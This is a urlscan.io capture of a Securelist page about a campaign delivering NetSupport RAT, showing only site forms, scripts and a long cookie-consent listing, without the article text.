securelist.com
Open in
urlscan Pro
158.160.164.142
Public Scan
Submitted URL: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#new_tab
Effective URL: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/
Submission: On December 04 via api from IN — Scanned from US
Effective URL: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/
Submission: On December 04 via api from IN — Scanned from US
Form analysis 12 forms found in the DOM
<form>
<fieldset>
<legend class="visuallyhidden">Consent Selection</legend>
<div id="CybotCookiebotDialogBodyFieldsetInnerContainer">
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonNecessary"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Necessary</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper CybotCookiebotDialogBodyLevelButtonSliderWrapperDisabled"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessary"
class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonPreferences"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Preferences</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferences" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonPreferencesInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonStatistics"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Statistics</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatistics" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonStatisticsInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
<div class="CybotCookiebotDialogBodyLevelButtonWrapper"><label class="CybotCookiebotDialogBodyLevelButtonLabel" for="CybotCookiebotDialogBodyLevelButtonMarketing"><strong
class="CybotCookiebotDialogBodyLevelButtonDescription">Marketing</strong></label>
<div class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketing" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox"
data-target="CybotCookiebotDialogBodyLevelButtonMarketingInline" checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></div>
</div>
</div>
</fieldset>
</form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonNecessaryInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelButtonDisabled" disabled="disabled" checked="checked"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonPreferencesInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonPreferences"
checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonStatisticsInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonStatistics"
checked="checked" tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form><input type="checkbox" id="CybotCookiebotDialogBodyLevelButtonMarketingInline" class="CybotCookiebotDialogBodyLevelButton CybotCookiebotDialogBodyLevelConsentCheckbox" data-target="CybotCookiebotDialogBodyLevelButtonMarketing" checked="checked"
tabindex="0"> <span class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form><form class="CybotCookiebotDialogBodyLevelButtonSliderWrapper"><input type="checkbox" id="CybotCookiebotDialogBodyContentCheckboxPersonalInformation" class="CybotCookiebotDialogBodyLevelButton"> <span
class="CybotCookiebotDialogBodyLevelButtonSlider"></span></form>GET https://securelist.com/
<form class="c-page-search__form c-page-search__form--small js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get">
<div class="c-form-element c-form-element--style-fill">
<div class="c-form-element__field wp_autosearch_form_wrapper">
<input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off">
</div>
</div>
<button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use>
</svg></button>
</form>GET https://securelist.com/
<form class="c-page-search__form js-main-search-popup js-wizardinfosys_autosearch_form" full_search_url="https://securelist.com/?s=%q%" action="https://securelist.com/" method="get">
<div class="c-form-element c-form-element--style-fill">
<div class="c-form-element__field wp_autosearch_form_wrapper">
<input name="s" class="c-form-element__text wp_autosearch_input ac_input" data-webinars="" type="text" value="" placeholder="Search..." autocomplete="off">
</div>
</div>
<button class="c-button c-button--icon wp_autosearch_submit"><svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-search"></use>
</svg></button>
</form>POST https://securelist.com/wp-comments-post.php
<form action="https://securelist.com/wp-comments-post.php" method="post" id="loginform" class="comment-form">
<p class="comment-notes"><span id="email-notes">Your email address will not be published.</span> <span class="required-field-message">Required fields are marked <span class="required">*</span></span></p>
<div class="comment-form-comment"><textarea id="comment" name="comment" style="width:100%" rows="8" aria-required="true" placeholder="Type your comment here"></textarea></div><!-- .comment-form-comment -->
<p class="comment-form-author"><label for="author">Name <span class="required">*</span></label> <input id="author" name="author" type="text" value="" size="30" maxlength="245" autocomplete="name" required="required"></p>
<p class="comment-form-email"><label for="email">Email <span class="required">*</span></label> <input id="email" name="email" type="text" value="" size="30" maxlength="100" aria-describedby="email-notes" autocomplete="email" required="required">
</p>
<script type="text/javascript">
document.addEventListener("input", function(event) {
if (!event.target.closest("#comment")) return;
try {
grecaptcha.render("recaptcha-submit-btn-area", {
"sitekey": "6LfQdrAaAAAAAEb_rTrwlbyc8z0Fa9CMjELY_2Ts",
"theme": "standard"
});
} catch (error) {
/*possible duplicated instances*/ }
});
</script>
<script src="https://www.google.com/recaptcha/api.js?hl=en&render=explicit" async="" defer=""></script>
<div id="recaptcha-submit-btn-area"> </div>
<noscript>
<style type="text/css">
#form-submit-save {
display: none;
}
</style>
<input name="submit" type="submit" id="submit-alt" tabindex="6" value="Submit Comment">
</noscript>
<p class="form-submit"><input name="submit" type="submit" id="commentsubmit" class="submit"
value="Comment"><a rel="nofollow" id="cancel-comment-reply-link" href="/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#respond" style="display:none;">Cancel</a> <input type="hidden" name="comment_post_ID" value="114740"
id="comment_post_ID">
<input type="hidden" name="comment_parent" id="comment_parent" value="0">
</p>
<p style="display: none;"><input type="hidden" id="akismet_comment_nonce" name="akismet_comment_nonce" value="1ecc244fd8"></p>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_1" name="ak_js"
value="1733291932642">
<script>
document.getElementById("ak_js_1").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_1531867064
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_1531867064" id="gform_1531867064" class="subscribe-mc" action="/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_1531867064">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_1531867064" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_email">
<div class="fl-wrap fl-wrap-input"><label class="gfield_label screen-reader-text fl-label" for="input_1531867064_1">Email(Required)</label><input name="input_1" id="input_1531867064_1" type="text" value="" class="medium fl-input"
placeholder="Email(Required)" aria-required="true" aria-invalid="false" data-placeholder="Email"></div>
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_1531867064_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_1531867064_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_1531867064_11_2_1">
<label for="choice_1531867064_11_2_1" id="label_1531867064_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button type="submit" class="gform_button button" id="gform_submit_button_1531867064" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span>Subscribe</span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_1531867064_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_1531867064_11" value="1">
<input type="hidden" name="gform_random_id" value="1531867064"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=sidebar">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_2" name="ak_js"
value="1733291932644">
<script>
document.getElementById("ak_js_2").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_4063322535
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_4063322535" id="gform_4063322535" class="subscribe-mc" action="/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_4063322535">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_4063322535" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible"><label class="gfield_label screen-reader-text" for="input_4063322535_1">Email<span
class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></label>
<div class="ginput_container ginput_container_email">
<input name="input_1" id="input_4063322535_1" type="text" value="" class="medium" placeholder="Email" aria-required="true" aria-invalid="false">
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_4063322535_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_4063322535_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_4063322535_11_2_1">
<label for="choice_4063322535_11_2_1" id="label_4063322535_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button class="gform_button button" type="submit" id="gform_submit_button_4063322535" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large u-hidden u-inline-block@sm">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span class="u-hidden u-inline@sm">Subscribe</span>
<span class="u-hidden@sm"><svg class="o-icon o-svg-icon o-svg-right">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-arrow"></use>
</svg></span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_4063322535_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_4063322535_11" value="1">
<input type="hidden" name="gform_random_id" value="4063322535"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_3" name="ak_js"
value="1733291932695">
<script>
document.getElementById("ak_js_3").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>POST /horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_2811086742
<form method="post" enctype="multipart/form-data" target="gform_ajax_frame_2811086742" id="gform_2811086742" class="subscribe-mc" action="/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#gf_2811086742">
<div class="gform-content-wrapper">
<div class="gform_body gform-body">
<div id="gform_fields_2811086742" class="gform_fields top_label form_sublabel_below description_below">
<div id="field_11_1" class="gfield gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<div class="ginput_container ginput_container_email">
<div class="fl-wrap fl-wrap-input"><label class="gfield_label screen-reader-text fl-label" for="input_2811086742_1">Email(Required)</label><input name="input_1" id="input_2811086742_1" type="text" value="" class="medium fl-input"
placeholder="Email(Required)" aria-required="true" aria-invalid="false" data-placeholder="Email"></div>
</div>
</div>
<div id="field_11_3" class="gfield js-kaspersky-gform-recaptcha-placeholder gform_hidden field_sublabel_below field_description_below gfield_visibility_hidden">
<div class="ginput_container ginput_container_text"><input name="input_3" id="input_2811086742_3" type="hidden" class="gform_hidden" aria-invalid="false" value=""></div>
</div>
<fieldset id="field_11_2" class="gfield input-without-label label-gdpr gfield_contains_required field_sublabel_below field_description_below gfield_visibility_visible">
<legend class="gfield_label screen-reader-text gfield_label_before_complex"><span class="gfield_required"><span class="gfield_required gfield_required_text">(Required)</span></span></legend>
<div class="ginput_container ginput_container_checkbox">
<div class="gfield_checkbox" id="input_2811086742_2">
<div class="gchoice gchoice_11_2_1">
<input class="gfield-choice-input" name="input_2.1" type="checkbox" value="I agree" id="choice_2811086742_11_2_1">
<label for="choice_2811086742_11_2_1" id="label_2811086742_11_2_1">I agree to provide my email address to “AO Kaspersky Lab” to receive information about new posts on the site. I understand that I can withdraw this consent at any time
via e-mail by clicking the “unsubscribe” link that I find at the bottom of any e-mail sent to me for the purposes mentioned above.</label>
</div>
</div>
</div>
</fieldset>
</div>
</div>
<div class="gform_footer top_label"> <button type="submit" class="gform_button button" id="gform_submit_button_2811086742" value="Sign up">
<svg class="o-icon o-svg-icon o-svg-large">
<use xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="https://securelist.com/wp-content/themes/securelist2020/assets/sprite/icons.svg#icon-envelope"></use>
</svg> <span>Subscribe</span>
</button>
<input type="hidden" name="gform_ajax" value="form_id=11&title=&description=&tabindex=0">
<input type="hidden" class="gform_hidden" name="is_submit_11" value="1">
<input type="hidden" class="gform_hidden" name="gform_submit" value="11">
<input type="hidden" class="gform_hidden" name="gform_unique_id" value="">
<input type="hidden" class="gform_hidden" name="state_11" value="WyJbXSIsImIwODQwZTA2ZGQ0NzYwODcyOTBkZjNmZDM1NDk2Y2ZkIl0=">
<input type="hidden" class="gform_hidden" name="gform_target_page_number_11" id="gform_target_page_number_2811086742_11" value="0">
<input type="hidden" class="gform_hidden" name="gform_source_page_number_11" id="gform_source_page_number_2811086742_11" value="1">
<input type="hidden" name="gform_random_id" value="2811086742"><input type="hidden" name="gform_field_values" value="securelist_2020_form_location=sidebar">
</div>
</div>
<p style="display: none !important;" class="akismet-fields-container" data-prefix="ak_"><label>Δ<textarea name="ak_hp_textarea" cols="45" rows="8" maxlength="100"></textarea></label><input type="hidden" id="ak_js_4" name="ak_js"
value="1733291932703">
<script>
document.getElementById("ak_js_4").setAttribute("value", (new Date()).getTime());
</script>
</p>
</form>Text Content
* Consent
* Details
* [#IABV2SETTINGS#]
* About
THIS WEBSITE USES COOKIES
We use cookies to personalise content and ads, to provide social media features
and to analyse our traffic. We also share information about your use of our site
with our social media, advertising and analytics partners who may combine it
with other information that you’ve provided to them or that they’ve collected
from your use of their services.
Consent Selection
Necessary
Preferences
Statistics
Marketing
Show details
* Necessary 24
Necessary cookies help make a website usable by enabling basic functions like
page navigation and access to secure areas of the website. The website cannot
function properly without these cookies.
* Adobe Inc.
1
Learn more about this provider
demdexVia a unique ID that is used for semantic content analysis, the
user's navigation on the website is registered and linked to offline data
from surveys and similar registrations to display targeted ads.
Maximum Storage Duration: 180 daysType: HTTP Cookie
* Cookiebot
2
Learn more about this provider
CookieConsent [x2]Stores the user's cookie consent state for the current
domain
Maximum Storage Duration: 1 yearType: HTTP Cookie
* Google
9
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
ar_debug [x2]Checks whether a technical debugger-cookie is present.
Maximum Storage Duration: 30 daysType: HTTP Cookie
test_cookieUsed to check if the user's browser supports cookies.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_GRECAPTCHAPending
Maximum Storage Duration: 180 daysType: HTTP Cookie
rc::aThis cookie is used to distinguish between humans and bots. This is
beneficial for the website, in order to make valid reports on the use of
their website.
Maximum Storage Duration: PersistentType: HTML Local Storage
rc::bThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: SessionType: HTML Local Storage
rc::cThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: SessionType: HTML Local Storage
rc::d-15#This cookie is used to distinguish between humans and bots.
Maximum Storage Duration: PersistentType: HTML Local Storage
rc::fThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: PersistentType: HTML Local Storage
* Kaspersky Lab
6
Learn more about this provider
AMCV_# [x2]Unique user ID that recognizes the user on returning visits
Maximum Storage Duration: 2 yearsType: HTTP Cookie
AMCVS_#AdobeOrg [x2]Pending
Maximum Storage Duration: SessionType: HTTP Cookie
test [x2]Used to detect if the visitor has accepted the marketing category
in the cookie banner. This cookie is necessary for GDPR-compliance of the
website.
Maximum Storage Duration: SessionType: HTTP Cookie
* Linkedin
1
Learn more about this provider
splitThis cookie is used to distinguish between humans and bots.
Maximum Storage Duration: 30 daysType: HTTP Cookie
* Yandex
2
Learn more about this provider
sync_cookie_csrf [x2]Used in connection with the synchronisation between
the website and third-party Data Management Platform. The cookie serves to
monitor this process for security reasons.
Maximum Storage Duration: 1 dayType: HTTP Cookie
* s.go-mpulse.net
1
RTThis cookie is used to identify the visitor through an application. This
allows the visitor to login to a website through their LinkedIn
application for example.
Maximum Storage Duration: 7 daysType: HTTP Cookie
* yandex.com
yandex.ru
2
i [x2]Preserves users states across page requests.
Maximum Storage Duration: 400 daysType: HTTP Cookie
* Preferences 0
Preference cookies enable a website to remember information that changes the
way the website behaves or looks, like your preferred language or the region
that you are in.
We do not use cookies of this type.
* Statistics 17
Statistic cookies help website owners to understand how visitors interact
with websites by collecting and reporting information anonymously.
* Google
8
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
_ga [x4]Registers a unique ID that is used to generate statistical data on
how the visitor uses the website.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
_gid [x2]Registers a unique ID that is used to generate statistical data
on how the visitor uses the website.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_ga_# [x2]Used by Google Analytics to collect data on the number of times
a user has visited the website as well as dates for the first and most
recent visit.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
* Kaspersky Lab
3
Learn more about this provider
b/ss/#/1/#/s#Registers data on visitors' website-behaviour. This is used
for internal analysis and website optimization.
Maximum Storage Duration: SessionType: Pixel Tracker
s_cc [x2]Used to check if the user's browser supports cookies.
Maximum Storage Duration: SessionType: HTTP Cookie
* Linkedin
1
Learn more about this provider
browser_idUsed to recognise the visitor's browser upon reentry on the
website.
Maximum Storage Duration: 5 yearsType: HTTP Cookie
* Yandex
3
Learn more about this provider
__ym_tab_guidPending
Maximum Storage Duration: SessionType: HTML Local Storage
_ym_retryReqsRegisters statistical data on users' behaviour on the
website. Used for internal analytics by the website operator.
Maximum Storage Duration: PersistentType: HTML Local Storage
_ym3:0_reqNumRegisters statistical data on users' behaviour on the
website. Used for internal analytics by the website operator.
Maximum Storage Duration: PersistentType: HTML Local Storage
* yandex.com
yandex.ru
2
yandexuid [x2]Registers data on visitors' website-behaviour. This is used
for internal analysis and website optimization.
Maximum Storage Duration: 400 daysType: HTTP Cookie
* Marketing 71
Marketing cookies are used to track visitors across websites. The intention
is to display ads that are relevant and engaging for the individual user and
thereby more valuable for publishers and third party advertisers.
* Meta Platforms, Inc.
5
Learn more about this provider
fbssls_#Collects data on the visitor’s use of the comment system on the
website, and what blogs/articles the visitor has read. This can be used
for marketing purposes.
Maximum Storage Duration: SessionType: HTML Local Storage
lastExternalReferrerDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
lastExternalReferrerTimeDetects how the user reached the website by
registering their last URL-address.
Maximum Storage Duration: PersistentType: HTML Local Storage
_fbp [x2]Used by Facebook to deliver a series of advertisement products
such as real time bidding from third party advertisers.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
* Adobe Inc.
1
Learn more about this provider
_dpThis cookie is set by the audience manager of a website in order to
determine if any additional third-party cookies can be set in the
visitor’s browser – third-party cookies are used to gather information or
track visitor behavior on multiple websites. Third-party cookies are set
by a third-party website or company.
Maximum Storage Duration: SessionType: HTTP Cookie
* Bitrix24
2
Learn more about this provider
b24_crm_guest_pagesSets a unique ID for the specific user. This allows the
website to target the user with relevant offers through its chat
functionality.
Maximum Storage Duration: PersistentType: HTML Local Storage
b24_crm_guest_utmSets a unique ID for the specific user. This allows the
website to target the user with relevant offers through its chat
functionality.
Maximum Storage Duration: PersistentType: HTML Local Storage
* BrightTalk
2
Learn more about this provider
_boomr_akamaiXhrRetryCollects information on user preferences and/or
interaction with web-campaign content - This is used on
CRM-campaign-platform used by website owners for promoting events or
products.
Maximum Storage Duration: PersistentType: HTML Local Storage
ga_clientIdUsed to send data to Google Analytics about the visitor's
device and behavior. Tracks the visitor across devices and marketing
channels.
Maximum Storage Duration: PersistentType: HTML Local Storage
* Google
8
Learn more about this provider
Some of the data collected by this provider is for the purposes of
personalization and measuring advertising effectiveness.
activity;register_conversion=#;#=#Pending
Maximum Storage Duration: SessionType: Pixel Tracker
IDEUsed by Google DoubleClick to register and report the website user's
actions after viewing or clicking one of the advertiser's ads with the
purpose of measuring the efficacy of an ad and to present targeted ads to
the user.
Maximum Storage Duration: 400 daysType: HTTP Cookie
receive-cookie-deprecationCollects information on user behaviour on
multiple websites. This information is used in order to optimize the
relevance of advertisement on the website.
Maximum Storage Duration: 180 daysType: HTTP Cookie
NIDRegisters a unique ID that identifies a returning user's device. The ID
is used for targeted ads.
Maximum Storage Duration: 6 monthsType: HTTP Cookie
pagead/1p-conversion/#/Pending
Maximum Storage Duration: SessionType: Pixel Tracker
_gcl_au [x2]Used by Google AdSense for experimenting with advertisement
efficiency across websites using their services.
Maximum Storage Duration: 3 monthsType: HTTP Cookie
AwinChannelCookiePending
Maximum Storage Duration: SessionType: HTTP Cookie
* Marketo
1
Learn more about this provider
_mkto_trkContains data on visitor behaviour and website interaction. This
is used in context with the email marketing service Marketo.com, which
allows the website to target visitors via email.
Maximum Storage Duration: 2 yearsType: HTTP Cookie
* Twitter Inc.
1
Learn more about this provider
i/jot/embedsSets a unique ID for the visitor, that allows third party
advertisers to target the visitor with relevant advertisement. This
pairing service is provided by third party advertisement hubs, which
facilitates real-time bidding for advertisers.
Maximum Storage Duration: SessionType: Pixel Tracker
* Yandex
21
Learn more about this provider
_ym#_lastHitPending
Maximum Storage Duration: PersistentType: HTML Local Storage
_ym#_lsidPending
Maximum Storage Duration: PersistentType: HTML Local Storage
_ym_syncedTracks the user’s interaction with the website’s
search-bar-function. This data can be used to present the user with
relevant products or services.
Maximum Storage Duration: PersistentType: HTML Local Storage
_ym_uidCollects data on the user’s navigation and behavior on the website.
This is used to compile statistical reports and heatmaps for the website
owner.
Maximum Storage Duration: PersistentType: HTML Local Storage
_ym_wv2rf:#:0Pending
Maximum Storage Duration: PersistentType: HTML Local Storage
sync_cookie_okUsed for data-synchronization with advertisement networks.
Maximum Storage Duration: 1 dayType: HTTP Cookie
watch/# [x2]Pending
Maximum Storage Duration: SessionType: Pixel Tracker
webvisor/#Pending
Maximum Storage Duration: SessionType: Pixel Tracker
_ym_d [x2]Contains the date of the visitor's first visit to the website.
Maximum Storage Duration: 1 yearType: HTTP Cookie
_ym_isad [x2]This cookie is used to determine if the visitor has any
adblocker software in their browser – this information can be used to make
website content inaccessible to visitors if the website is financed with
third-party advertisement.
Maximum Storage Duration: 1 dayType: HTTP Cookie
_ym_uid [x2]This cookie is used to collect non-personal information on the
visitor's website behavior and non-personal visitor statistics.
Maximum Storage Duration: 1 yearType: HTTP Cookie
_ym_visorc [x2]Saves information of actions that have been carried out by
the user during the current visit to the website, including searches with
keywords included.
Maximum Storage Duration: 1 dayType: HTTP Cookie
metrika_enabled [x2]Used to track visitors on multiple websites, in order
to present relevant advertisement based on the visitor's preferences.
Maximum Storage Duration: SessionType: HTTP Cookie
sync_cookie_image_finishUsed for data-synchronization with advertisement
networks.
Maximum Storage Duration: SessionType: Pixel Tracker
yuidssCollects information on user behaviour on multiple websites. This
information is used in order to optimize the relevance of advertisement on
the website.
Maximum Storage Duration: 400 daysType: HTTP Cookie
* YouTube
21
Learn more about this provider
#-#Used to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTML Local Storage
__Secure-ROLLOUT_TOKENPending
Maximum Storage Duration: 180 daysType: HTTP Cookie
iU5q-!O9@$Registers a unique ID to keep statistics of what videos from
YouTube the user has seen.
Maximum Storage Duration: SessionType: HTML Local Storage
LAST_RESULT_ENTRY_KEYUsed to track user’s interaction with embedded
content.
Maximum Storage Duration: SessionType: HTTP Cookie
LogsDatabaseV2:V#||LogsRequestsStoreUsed to track user’s interaction with
embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
nextIdUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
remote_sidNecessary for the implementation and functionality of YouTube
video-content on the website.
Maximum Storage Duration: SessionType: HTTP Cookie
requestsUsed to track user’s interaction with embedded content.
Maximum Storage Duration: SessionType: HTTP Cookie
ServiceWorkerLogsDatabase#SWHealthLogNecessary for the implementation and
functionality of YouTube video-content on the website.
Maximum Storage Duration: PersistentType: IndexedDB
TESTCOOKIESENABLEDUsed to track user’s interaction with embedded content.
Maximum Storage Duration: 1 dayType: HTTP Cookie
VISITOR_INFO1_LIVETries to estimate the users' bandwidth on pages with
integrated YouTube videos.
Maximum Storage Duration: 180 daysType: HTTP Cookie
YSCRegisters a unique ID to keep statistics of what videos from YouTube
the user has seen.
Maximum Storage Duration: SessionType: HTTP Cookie
ytidb::LAST_RESULT_ENTRY_KEYStores the user's video player preferences
using embedded YouTube video
Maximum Storage Duration: PersistentType: HTML Local Storage
YtIdbMeta#databasesUsed to track user’s interaction with embedded content.
Maximum Storage Duration: PersistentType: IndexedDB
yt-remote-cast-availableStores the user's video player preferences using
embedded YouTube video
